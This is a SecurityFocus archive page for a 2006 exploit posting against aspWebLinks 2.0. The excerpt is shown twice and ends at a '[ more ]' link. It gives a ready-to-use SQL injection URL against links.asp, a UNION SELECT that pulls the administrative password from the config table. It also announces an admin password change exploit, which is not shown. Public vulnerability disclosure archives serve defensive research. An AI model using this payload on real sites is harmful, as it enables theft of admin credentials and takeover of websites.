Back to list
Name:
Email:
*Note: Email address will appear as "user domain ext" to prevent harvesting.
Subject:
Message:
aspWebLinks 2.0 Remote SQL Injection / Admin Pass Change Exploit
Jun 02 2006 07:15AM
ajannhwt hotmail com
<!--
# Title : aspWebLinks 2.0 Remote Admin Pass Change Exploit and links.asp SQL Injection
# Author : ajann
# Dork : aspWebLinks 2.0
SQL INJECTION:
http://[target]/[path]/links.asp?action=reporterror&linkID=221%20union%2
0select+0,administrativepassword,0,0,0,0,0,0,0+from+config
-->...
[ more ]
Privacy Statement
Copyright 2010, SecurityFocus
# Title : aspWebLinks 2.0 Remote Admin Pass Change Exploit and links.asp SQL Injection
# Author : ajann
# Dork : aspWebLinks 2.0
SQL INJECTION:
http://[target]/[path]/links.asp?action=reporterror&linkID=221%20union%2
0select+0,administrativepassword,0,0,0,0,0,0,0+from+config
-->...
[ more ]